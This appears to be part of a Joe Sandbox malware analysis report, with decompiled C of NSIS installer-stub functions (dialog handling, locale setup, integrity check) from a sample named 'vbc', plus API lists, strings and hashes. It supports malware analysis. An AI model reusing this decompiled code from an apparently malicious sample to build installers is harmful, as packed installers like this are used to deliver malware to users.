						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x7a7a38, 0x40f, 0, 1);
						__eflags =  *0x7a7a2c;
						return 0 |  *0x7a7a2c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x7a1f28, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x7a7a38, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x7a8aec - _t136;
											if( *0x7a8aec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x7a0718 = 1;
												L23:
												_push(0x78);
												L24:
												E0040444F();
												goto L28;
											}
											E0040140B(_t129);
											 *0x7a0718 = _t129;
											goto L23;
										}
										__eflags =  *0x40a368 - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x7a7a38);
						 *0x7a7a38 = _t122;
						L60:
						if( *0x7a3f48 == _t136 &&  *0x7a7a38 != _t136) {
							ShowWindow(_t127, 0xa); // executed
							 *0x7a3f48 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x7a1f28,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E004044DD(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}

0x00403f82
0x00403f89
0x004040f0
0x004040f4
0x004040f8
0x004040fa
0x004040ff
0x0040410a
0x00404115
0x0040411a
0x0040411c
0x0040411e
0x00404121
0x00404126
0x00404134
0x00404141
0x00404148
0x00404148
0x00404149
0x00404149
0x0040414e
0x00404154
0x0040415b
0x00404161
0x00404163
0x004041a3
0x004041a8
0x004041ad
0x004041ad
0x004041b2
0x004041bb
0x004041bd
0x004041c2
0x004041c8
0x004041cc
0x004041cc
0x004041d1
0x004041d7
0x00000000
0x00000000
0x004041e2
0x004041e8
0x00000000
0x00000000
0x004041f1
0x004041f9
0x004041fe
0x00404201
0x00404207
0x0040420c
0x0040420f
0x00404215
0x0040421a
0x0040421d
0x00404223
0x0040422b
0x00404231
0x00404237
0x0040423b
0x00404242
0x00404242
0x00404242
0x0040424c
0x0040425e
0x0040426a
0x0040426f
0x00404279
0x0040427f
0x00404281
0x00404286
0x00404283
0x00404283
0x00404283
0x00404296
0x004042ae
0x004042b0
0x004042b6
0x004042cb
0x004042b8
0x004042c1
0x004042c3
0x004042c3
0x004042d1
0x004042e2
0x004042f8
0x004042ff
0x00404309
0x0040430e
0x00404310
0x00000000
0x00404316
0x00404316
0x00404318
0x00000000
0x00000000
0x0040431e
0x00404322
0x00404347
0x0040434d
0x00404353
0x00404355
0x00000000
0x00000000
0x0040437b
0x00404381
0x00404383
0x00404388
0x00000000
0x00000000
0x0040438e
0x00404391
0x00404394
0x004043ab
0x004043b7
0x004043d0
0x004043da
0x004043df
0x004043e5
0x00000000
0x00000000
0x004043ef
0x004043fa
0x00000000
0x004043fa
0x00404324
0x0040432a
0x00000000
0x00000000
0x00404330
0x00404336
0x00000000
0x00000000
0x00000000
0x0040433c
0x00404310
0x00404407
0x00404413
0x0040441a
0x00000000
0x00404165
0x00404165
0x00404168
0x0040419b
0x0040419b
0x0040419d
0x00000000
0x00000000
0x00000000
0x0040419d
0x0040416e
0x00404173
0x00404175
0x00000000
0x00000000
0x00404185
0x0040418d
0x00000000
0x00404193
0x00403f9b
0x00403f9b
0x00403f9f
0x00403fa4
0x00403fb3
0x00403fb3
0x00403fb9
0x00403fc0
0x00404004
0x0040400a
0x00404023
0x00404026
0x00404039
0x0040403f
0x00000000
0x00000000
0x00404045
0x00404050
0x00404052
0x00404054
0x00404073
0x00404073
0x00404076
0x0040407b
0x0040407e
0x0040408e
0x0040408f
0x00404091
0x004040c7
0x004040d7
0x00000000
0x004040d7
0x00404093
0x00404099
0x004040b2
0x004040b7
0x004040b9
0x00000000
0x00000000
0x004040bb
0x004040a7
0x004040a7
0x004040a9
0x004040a9
0x00000000
0x004040a9
0x0040409c
0x004040a1
0x00000000
0x004040a1
0x00404080
0x00404086
0x00000000
0x00000000
0x00404088
0x00000000
0x00404088
0x00404078
0x00000000
0x00404078
0x0040405e
0x00404065
0x0040406b
0x0040406d
0x00404443
0x00000000
0x00404443
0x00000000
0x0040406d
0x0040402b
0x00000000
0x00404033
0x00404012
0x00404018
0x00404420
0x00404426
0x00404433
0x00404439
0x00404439
0x00000000
0x00403fc2
0x00403fc7
0x00403fd3
0x00403fdc
0x004040dd
0x00000000
0x00403ffb
0x00403ffe
0x00000000
0x00403ffe
0x00403fdc
0x00403fc0

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FB3
ShowWindow.USER32(?), ref: 00403FD3
GetWindowLongW.USER32(?,000000F0), ref: 00403FE5
ShowWindow.USER32(?,00000004), ref: 00403FFE
DestroyWindow.USER32 ref: 00404012
SetWindowLongW.USER32 ref: 0040402B
GetDlgItem.USER32(?,?), ref: 0040404A
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040405E
IsWindowEnabled.USER32(00000000), ref: 00404065
GetDlgItem.USER32(?,00000001), ref: 00404110
GetDlgItem.USER32(?,00000002), ref: 0040411A
SetClassLongW.USER32(?,000000F2,?), ref: 00404134
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404185
GetDlgItem.USER32(?,00000003), ref: 0040422B
ShowWindow.USER32(00000000,?), ref: 0040424C
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040425E
EnableWindow.USER32(?,?), ref: 00404279
GetSystemMenu.USER32 ref: 0040428F
EnableMenuItem.USER32 ref: 00404296
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042AE
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042C1
lstrlenW.KERNEL32(007A1F48,?,007A1F48,00000000), ref: 004042EB
SetWindowTextW.USER32 ref: 004042FF
ShowWindow.USER32(?,0000000A), ref: 00404433

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: 0031e1bd5cfe270ad991aee2cec6f31fffa44afcca6ec19933d696454b5d3b77
Instruction ID: a523085d0bb4d20675d087507fe11aed99bae63dd77e7307ea40df4209393f8b
Opcode Fuzzy Hash: 0031e1bd5cfe270ad991aee2cec6f31fffa44afcca6ec19933d696454b5d3b77
Instruction Fuzzy Hash: 7FC1CEB1500604ABDB206F21ED85E2A3A69FBC6709F00853EF791B25E0CB3D5851DB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403BC9 Relevance: 42.2, APIs: 13, Strings: 11, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403BC9(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x7a8a70;
				_t22 = E004068E7(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x7a1f48;
					L"1033" = 0x30;
					 *0x7b5002 = 0x78;
					 *0x7b5004 = 0;
					E004063E8(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f48, 0);
					__eflags =  *0x7a1f48;
					if(__eflags == 0) {
						E004063E8(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x7a1f48, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E00406461(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403E9F(_t78, _t90);
				 *0x7a8ae0 =  *0x7a8a78 & 0x00000020;
				 *0x7a8afc = 0x10000;
				if(E00405EF1(_t90, 0x7b3800) != 0) {
					L16:
					if(E00405EF1(_t98, 0x7b3800) == 0) {
						E00406557(_t76, 0, _t82, 0x7b3800,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x7a8a60, 0x67, 1, 0, 0, 0x8040);
					 *0x7a7a48 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403E9F(_t78, __eflags);
							__eflags =  *0x7a8b00;
							if( *0x7a8b00 != 0) {
								_t33 = E0040564F(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x7a7a2c;
								if( *0x7a7a2c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x7a1f28, 5); // executed
							_t39 = E00406877("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E00406877("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x7a7a00);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x7a7a00);
								 *0x7a7a24 = _t87;
								RegisterClassW(0x7a7a00);
							}
							_t44 = DialogBoxParamW( *0x7a8a60,  *0x7a7a40 + 0x00000069 & 0x0000ffff, 0, E00403F77, 0); // executed
							E00403B19(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x7a8a60;
						 *0x7a7a04 = E00401000;
						 *0x7a7a10 =  *0x7a8a60;
						 *0x7a7a14 = _t30;
						 *0x7a7a24 = 0x40a380;
						if(RegisterClassW(0x7a7a00) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x7a1f28 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8a60, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x7a6a00;
					E004063E8(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8a98 + _t78 * 2,  *0x7a8a98 +  *(_t82 + 0x4c) * 2, 0x7a6a00, 0);
					_t63 =  *0x7a6a00; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x7a6a02;
						 *((short*)(E00405E16(0x7a6a02, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040651A(0x7b3800, E00405DE9(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E35(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403bcf
0x00403bd8
0x00403bdf
0x00403be1
0x00403bf5
0x00403c07
0x00403c10
0x00403c19
0x00403c20
0x00403c25
0x00403c2c
0x00403c3f
0x00403c3f
0x00403c4a
0x00403be3
0x00403bee
0x00403bee
0x00403c4f
0x00403c62
0x00403c67
0x00403c78
0x00403d0a
0x00403d12
0x00403d1b
0x00403d1b
0x00403d31
0x00403d37
0x00403d45
0x00403dc6
0x00403dce
0x00403dd8
0x00403ddd
0x00403de3
0x00403e6d
0x00403e72
0x00403e74
0x00403e90
0x00000000
0x00403e90
0x00403e76
0x00403e7c
0x00403e84
0x00403e84
0x00000000
0x00403e7c
0x00403df1
0x00403dfc
0x00403e01
0x00403e03
0x00403e0a
0x00403e0a
0x00403e15
0x00403e1d
0x00403e1f
0x00403e21
0x00403e2a
0x00403e2d
0x00403e33
0x00403e33
0x00403e52
0x00403e63
0x00000000
0x00403e68
0x00403dd0
0x00403dd2
0x00000000
0x00403d47
0x00403d47
0x00403d53
0x00403d5d
0x00403d63
0x00403d68
0x00403d77
0x00403e95
0x00403e95
0x00000000
0x00403e95
0x00403d86
0x00403dc1
0x00000000
0x00403dc1
0x00403c7e
0x00403c7e
0x00403c81
0x00403c83
0x00000000
0x00000000
0x00403c91
0x00403ca3
0x00403ca8
0x00403cb1
0x00000000
0x00000000
0x00403cb7
0x00403cb9
0x00403cc6
0x00403cc6
0x00403ccf
0x00403cd5
0x00403cfd
0x00403d05
0x00000000
0x00403ce7
0x00403ce8
0x00403cf1
0x00403cf7
0x00403cf8
0x00000000
0x00403cf8
0x00403cf3
0x00403cf5
0x00000000
0x00000000
0x00000000
0x00403cf5
0x00403cd5

APIs

Part of subcall function 004068E7: GetModuleHandleA.KERNEL32(?,00000020,?,0040361A,0000000B), ref: 004068F9
Part of subcall function 004068E7: GetProcAddress.KERNEL32(00000000,?), ref: 00406914

lstrcatW.KERNEL32 ref: 00403C4A
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,007B3800,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,7556D4C4), ref: 00403CCA
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,007B3800,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000), ref: 00403CDD
GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403CE8
LoadImageW.USER32 ref: 00403D31

Part of subcall function 00406461: wsprintfW.USER32 ref: 0040646E

RegisterClassW.USER32 ref: 00403D6E
SystemParametersInfoW.USER32 ref: 00403D86
CreateWindowExW.USER32 ref: 00403DBB
ShowWindow.USER32(00000005,00000000), ref: 00403DF1
GetClassInfoW.USER32 ref: 00403E1D
GetClassInfoW.USER32 ref: 00403E2A
RegisterClassW.USER32 ref: 00403E33
DialogBoxParamW.USER32 ref: 00403E52

Strings

RichEd20, xrefs: 00403DF7
Control Panel\Desktop\ResourceLocale, xrefs: 00403BFD
_Nb, xrefs: 00403D4D, 00403DB5
RichEd32, xrefs: 00403E05
C:\Users\user\AppData\Local\Temp\, xrefs: 00403BCE
RichEdit20W, xrefs: 00403E15, 00403E1B
.DEFAULT\Control Panel\International, xrefs: 00403C35
.exe, xrefs: 00403CD7
1033, xrefs: 00403BE9, 00403C45
RichEdit, xrefs: 00403E24
Call, xrefs: 00403C91, 00403C9A, 00403CA8, 00403CF7, 00403CFD

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-2633365883
Opcode ID: 1166395d184842cca1f9c9dbf690e44f16c4877d7fe222633aad620317193a3c
Instruction ID: 5e1ff83f83eb9308ce16c84110d2fcc5f4f6a1078aae304d5a5647478e66a4f2
Opcode Fuzzy Hash: 1166395d184842cca1f9c9dbf690e44f16c4877d7fe222633aad620317193a3c
Instruction Fuzzy Hash: 0661A270240700BAD320AB669D45F2B3A6CEBC5B49F40853FF942B26E1DB7D9901CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040307D Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0040307D(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				 *0x7a8a6c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, 0x7b6800, 0x400);
				_t89 = E0040600A(0x7b6800, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				E0040651A(0x7b4800, 0x7b6800);
				E0040651A(0x7b7000, E00405E35(0x7b4800));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x79f704 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00403019(1);
					__eflags =  *0x7a8a74 - _t82;
					if( *0x7a8a74 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t34 =  &_v24; // 0x40385a
						_t53 = GlobalAlloc(0x40,  *_t34); // executed
						_t94 = _t53;
						E004034C2( *0x7a8a74 + 0x1c);
						_t35 =  &_v24; // 0x40385a
						_push( *_t35);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004032B4(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x7a8a70 = _t94;
							 *0x7a8a78 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x7a8a7c =  *0x7a8a7c + 1;
								__eflags =  *0x7a8a7c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405FC5(0x7a8a80, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004034C2( *0x7936f8);
					_t65 = E004034AC( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x7a8a74) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004034AC(0x78b6f8, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00403019(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x7a8a74;
						if( *0x7a8a74 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00403019(0);
							}
							goto L20;
						}
						E00405FC5( &_v44, 0x78b6f8, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x7936f8; // 0x4fcbb
						 *0x7a8b00 =  *0x7a8b00 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x7a8a74 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x79f704; // 0x4fcbf
						if(__eflags < 0) {
							_v12 = E004069D4(_v12, 0x78b6f8, _t90);
						}
						 *0x7936f8 =  *0x7936f8 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 != 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00403085
0x00403088
0x0040308b
0x004030a5
0x004030aa
0x004030bd
0x004030c2
0x004030c5
0x004030cb
0x00000000
0x004030cd
0x004030de
0x004030ef
0x004030f6
0x004030fc
0x004030fe
0x00403103
0x00403105
0x004031f0
0x004031f2
0x004031f7
0x004031fe
0x00000000
0x00000000
0x00403200
0x00403203
0x00403227
0x00403227
0x0040322c
0x00403232
0x0040323d
0x00403242
0x00403242
0x00403245
0x00403246
0x00403247
0x00403249
0x0040324e
0x00403251
0x00403264
0x00403268
0x00403270
0x00403275
0x00403277
0x00403277
0x00403277
0x0040327f
0x0040327f
0x00403282
0x00403283
0x00403283
0x00403286
0x00403288
0x00403288
0x00403288
0x00403292
0x00403298
0x004032a6
0x004032ab
0x00000000
0x004032ab
0x00000000
0x00403251
0x0040320b
0x00403216
0x0040321b
0x0040321d
0x00000000
0x00000000
0x00403222
0x00403225
0x00000000
0x00000000
0x00000000
0x0040310b
0x00403110
0x00403115
0x00403119
0x00403120
0x00403125
0x00403127
0x00403129
0x00403129
0x0040312d
0x00403132
0x00403134
0x0040325c
0x00403253
0x00000000
0x00403253
0x0040313a
0x00403141
0x004031bd
0x004031c1
0x004031c5
0x004031ca
0x00000000
0x004031c1
0x0040314a
0x0040314f
0x00403152
0x00403157
0x00000000
0x00000000
0x00403159
0x00403160
0x00000000
0x00000000
0x00403162
0x00403169
0x00000000
0x00000000
0x0040316b
0x00403172
0x00000000
0x00000000
0x00403174
0x0040317b
0x00000000
0x00000000
0x0040317d
0x00403183
0x0040318c
0x00403192
0x00403195
0x00403197
0x0040319d
0x00000000
0x00000000
0x004031a3
0x004031a7
0x004031af
0x004031af
0x004031b2
0x004031b5
0x004031b7
0x004031b9
0x004031b9
0x00000000
0x004031b7
0x004031a9
0x004031ad
0x00000000
0x00000000
0x00000000
0x004031cb
0x004031cb
0x004031d1
0x004031dd
0x004031dd
0x004031e0
0x004031e6
0x004031e6
0x004031e6
0x004031ee
0x004031ee
0x00000000
0x004031ee

APIs

GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000,?,?,?,?,?,0040385A,?), ref: 0040308E
GetModuleFileNameW.KERNEL32(00000000,007B6800,00000400,?,?,?,?,?,0040385A,?), ref: 004030AA

Part of subcall function 0040600A: GetFileAttributesW.KERNELBASE(00000003,004030BD,007B6800,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
Part of subcall function 0040600A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406030

GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,007B4800,007B4800,007B6800,007B6800,80000000,00000003,?,?,?,?,?,0040385A), ref: 004030F6
GlobalAlloc.KERNELBASE(00000040,Z8@,?,?,?,?,?,0040385A,?), ref: 0040322C

Strings

Inst, xrefs: 00403162
C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
soft, xrefs: 0040316B
Error launching installer, xrefs: 004030CD
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
Null, xrefs: 00403174
Z8@, xrefs: 00403227, 00403242

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$Z8@$soft
API String ID: 2803837635-1309756075
Opcode ID: 228fa0226a90281b4f2baa84689300d30e54d034f1a820beff8a1dc93a475882
